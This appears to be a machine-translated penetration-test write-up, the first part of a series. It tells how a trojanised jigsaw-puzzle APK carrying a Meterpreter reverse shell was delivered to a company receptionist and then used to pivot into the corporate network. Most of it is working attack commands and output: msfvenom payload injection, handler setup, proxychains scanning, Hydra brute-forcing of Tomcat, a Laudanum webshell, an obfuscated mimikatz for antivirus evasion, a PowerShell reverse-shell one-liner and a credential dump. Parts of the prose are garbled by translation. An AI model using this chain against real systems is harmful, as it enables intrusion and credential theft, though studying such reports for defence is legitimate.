Company Smartphone Security (A) - From APK to Golden Ticket: Initial Probing, Getting Domain Admin Access from an Android Smartphone, And More ...
This article describes the potential dangers of using a personal smart phone in an enterprise network, and these cases are typical after a real-life case has occurred. It turns out that it is not difficult to trick an employee into installing a malicious application, bypassing network protection, accessing corporate networks, elevating and obtaining confidential information.
In addition, it turns out that it is possible to bypass all protection mechanisms (including anti-virus software) without being discovered. An attacker could bypass this by using some of the system's native tools and publicly accessible scripts without having to rely too much on external tools.
This is what we often say KISS strategy (Keep It Simple Stupid)
It is pure coincidence that any of the following stories have any similarities with real events or real people.
background
Super Company hired our Penetrating Test Engineer to conduct a social engineering assessment of his staff in the area of finding all ways to steal confidential information so that employees
During the internal meeting, we asked to visit Guest WiFi. Guest WiFi is subject to exclusive protection and therefore needs to be logged in, valid for only one day.
Once connected to WiFi, we started a quick scan with Fing from the iPhone: As a result, we found several Android devices - which apparently exceeded the number of corporate visitors. We think even company employees also use Guest WiFi. Maybe save their valuable data plan. In fact, the receptionist who gave us the login credentials was talking to WhatsApp when we asked how to access the internet.
Scene: There are two phones on the table, a neat desktop, a family of three photos.
After a brief chat, I learned that her daughter is four years old and very active, but can calm down as long as the smart phone with the game installed. Ah, now the kids ah ...
Attack description
Social engineering began with a small-scale fishing effort that failed despite its failure. We then found out that company staff were trained before we attacked and were very vigilant about attachments, downloads, etc. We did not start well.
So we decided to focus on the receptionist, our aim is to let her download Android applications for children, what is more interesting for children than the puzzle it, Kazakhstan we like jigsaw puzzles ah.
Finding the receptionist's email address is easy, and we've got an email with a link to the download page. We also added a two-dimensional code in the mail, just swipe like a picture to install it.
Very cute right! Our goal is very easy to install malicious Android application, the application is really a jigsaw puzzle, but hides inside a Meterpreter shell
Aiming at the smartphone
Create a malicious Android application is very simple, we downloaded a normal application, and then use msfvenom to inject the payload, which is meterpreter shell
msfvenom -x puzzle.apk -p android / meterpreter / reverse_tcp LHOST = LPORT = 443 -o /var/www/html/puzzle.apk
The reason for listening on port 443 is that port 443 and port 80 are usually standard ports that are licensed by the firewall
We believe this app can arouse enough interest from the receptionist and ignore warnings during installation
In our host, also opened a listener:
msf> use exploit / multi / handler
msf exploit (handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf exploit (handler)> set lhost
lhost =>
msf exploit (handler)> set lport 443
lport => 443
msf exploit (handler)> exploit -j -z
[*] Started reverse TCP handler on: 443
In order to make use of the company staff will use the visitor WiFi for personal purposes, we also want to put an antenna near the company
Using Meterpreter
About 8:00 in the morning, I received the message msfconsole:
[*] Meterpreter session 1 opened (: 443 -> XXXX: 51990) at ...
Bingo! She installed and ran a malicious Android app and we now have a Meterpreter session
Now we need to know if she is connected to the company's WiFi network. IP test results show that it is connected from the cellular network, she may be on the way to the office, maybe her daughter is playing a jigsaw puzzle.
The conversation did not last long, and after a few minutes we lost the shell, but before 9:00 we received another Session:
[*] Meterpreter session 2 opened (: 443 -> KKKK: 61545) at ...
This IP is the company, indicating that she is connected to the company's WiFi network
So we started some preliminary exploration, in addition to a few smartphones, we only found a DNS server under a different subnet
meterpreter> ipconfig
...
Interface 9
============
Name: wlan0 - wlan0
Hardware MAC: 20: 6e: 9c: 75: 94: ba
IPv4 Address: 10.118.1.13
IPv4 Netmask: 255.255.255.0
IPv6 Address: fe80 :: 226e: 9cff: fe75: 94ba
IPv6 Netmask: ::
....
meterpreter> shell
Process 1 created.Channel 1 created.
getprop net.dns1
192.168.178.196
The guest WiFi network is on 10.118.1.0/24 and the DNS server is on another subnet
In order to access the subnet, we configured the route
exploit (handler)> route add 192.168.178.0 255.255.255.0 1
Nmap scanning can not be performed, so we did a quick ping scan using proxychains
msf auxiliary (socks4a)> use auxiliary / server / socks4a
msf auxiliary (socks4a)> show options
Module options (auxiliary / server / socks4a):
Name Current Setting Required Description
- ----- ---- ----
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on.
# Attacker proxychains nmap -sn 192.168.178.0/24 DNS network
Nmap scan report for 192.168.178.195
Host is up (0.15s latency).
Nmap scan report for 192.168.178.196
Host is up (0.22s latency).
The host responded to the ping scan
We went through a quick TCP scan again
msf exploit (handler)> use auxiliary / scanner / portscan / tcp
msf auxiliary (tcp)> set RHOSTS 192.168.178.195,196
msf auxiliary (tcp)> set RPORTS 1-1024
msf auxiliary (tcp)> run
[*] 192.168.178.195: - 192.168.178.195:80 - TCP OPEN
[*] 192.168.178.195: - 192.168.178.195:8080 - TCP OPEN
[*] 192.168.178.196: - 192.168.178.196:53 - TCP OPEN
This is our conjecture on the current network environment structure:
Aim at the intranet server
Host 192.168.178.195 opened ports 80 and 8080, and we ported the port locally to be able to analyze network traffic locally
meterpreter> portfwd add -L 127.0.0.1 -l 8001 -r 192.168.178.195 -p 80
meterpreter> portfwd add -L 127.0.0.1 -l 8002 -r 192.168.178.195 -p 8080
Port 80 exposes the company's phone book, and we still do not know why they are exposing the information on the visitor's network
Quick scan found no obvious loopholes, so we decided to check the next 8080 port
We encountered Apache Tomcat's basic authentication, using Hydra blasting, a few minutes later we use admin / password123456 login system
Now that we're in the Tomcat Admin console, this should be a firewall configuration error because neither the Tomcat Admin Console nor the company's Directory should be exposed on the guest network
We plan to upload a shell on Tomcat so we can interact with the underlying operating system. The server fingerprint shows that we are dealing with a Windows server.
We constructed the war-archive with the Laudanum Injectable Web Exploit Code, uploaded the waf file on the administration page, which contains:
cmd.jsp: Used to interact with cmd.exe
m.ps1: An obfuscated and kill free mimikatz.ps1 for grabbing passwords and hashes
Because of its flexibility, it's easy to confuse powershell scripts with several well-known obfuscation techniques. We've just changed some keywords, like changing Invoke-mimikatz to Invoke-mymy, and a few other tips for reference .
We also added Invoke-mymy -dumpcreds to the end of the file so that the functionality is executed directly
After uploading, we accessed cmd.jsp in the browser
Ha! The user is run as SYSTEM service privileges, we continue to collect information. First, to collect the environment variables:
Cmd / c set
The result is as follows:
ALLUSERSPROFILE = C: \ ProgramData
COMPUTERNAME = SRVINTRANET
USERDOMAIN = SUPERCOMPANY
USERNAME = SRVINTRANET $
Now we got the computer name SRVINTRANET, at the same time, it belongs to SUPERCOMPANY domain, perfect.
Continue to use systeminfo to retrieve other useful information:
Command: systeminfo
result:
Host Name: SRVINTRANET
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N / A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
...
Next is the domain controller
Command: cmd / c nltest / dclist: supercompany
result:
Get a list of DCs in domain 'supercompany' from '\\ SRVDC1'.
srvdc1.supercompany.local [PDC] [DS] Site: Default-First-Site-Name
srvdc2.supercompany.local [DS] Site: Default-First-Site-Name
The command completed successfully
This time Android device may have started to heat up, we need to move to a more suitable shell. Android devices are no longer suitable for our work.
Our golden rule is: Keep hidden and avoid anti-virus software. So we used PowerShell-based shell, hope SRVINTRANET can access the Internet bar.
Through the webshell Tomcat, we installed the Powershell back door, will perform one-way back to the order, at the same time our public network server with netcat listening port 80
$ s = $ c.GetStream (); [byte []] $ b = 0..65535 | cmd / c powershell -nop -c "$ c = New-Object Net.Sockets.TCPClient ('', 80) While ($ i = $ s.Read ($ b, 0, $ b.Length)) - ne 0) {; $ d = (New-Object -TypeName System.Text.ASCIIEncoding) .GetString ($ b, 0, $ i); $ sb = (IEX $ data 2> & 1 | Out-String); $ sb2 = $ sb + 'PS' + (pwd) .Path + '>'; $ sb = ([text .encoding] :: ASCII). GetBytes ($ sb2); $ s.Write ($ sb, 0, $ sb.Length);
$ s.Flush ()}; $ c.Close () "
What is the function of this script? It executes the following commands when starting PowerShell: Create a TCPClient object, connect back to our machine, open an I / O stream, and use InvokeExpression to execute the input
We are not so lucky this time, did not receive the reverse shell. This server may not be able to connect to the Internet, so we again turned to Tomcat's webshell, and installed the confused mimikatz
cmd / c powershell -executionpolicy bypass -fc: \ tomcat \ webapps \ cmd \ warfiles \ m.ps1
. #####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
. ## ^ ##. "A La Vie, A L'Amour"
## / \ ## / * * *
## / / ## Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * * /
mimikatz (powershell) # sekurlsa :: logonpasswords
Authentication Id: 0; 191734 (00000000: 0002ecf6)
Session: Interactive from 1
User Name: Administrator
Domain: SRVINTRANET
Logon Server: SRVINTRANET
Logon Time: 2/17/2017 2:12:31 PM
SID: S-1-5-21-938204560-2839928776-2225904511-500
msv:
[00010000] CredentialKeys
* NTLM: 604603ab105adc8XXXXXXXXXXXXXXXXX
* SHA1: 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
[00000003] Primary
* Username: Administrator
* Domain: SRVINTRANET
* NTLM: 604603ab105adc8XXXXXXXXXXXXXXXXX
* SHA1: 7754ff505598bf3XXXXXXXXXXXXXXXXXXXXXXXXX
tspkg:
wdigest:
* Username: Administrator
* Domain: SRVINTRANET
* Password: (null)
kerberos:
* Username: Administrator
* Domain: SRVINTRANET
* Password: (null)
ssp: KO
credman:
mimikatz (powershell) # exit
Bye!
We got the local administrator's password hashes, but no plaintext. This is because our target server is Windows Server 2012, and things changed after 2008, WDigest documents no longer plaintext (can not help but miss the good old days), credman is empty. In short, this finding is not bad.
We decided to find a server that had Internet access because we were still working on infiltration with an unstable Android phone.
Through the net view command, we have a list of available shared servers
Server Name Remark
-----------------
\\ SRVDC1 Domain controller PDC
\\ SRVDC2 [4] Domain Controller
\\ SRVWSUS Server WSUS
\\ SRVAV Server AV
\\ SRVFILE1 File Server
This is the real server network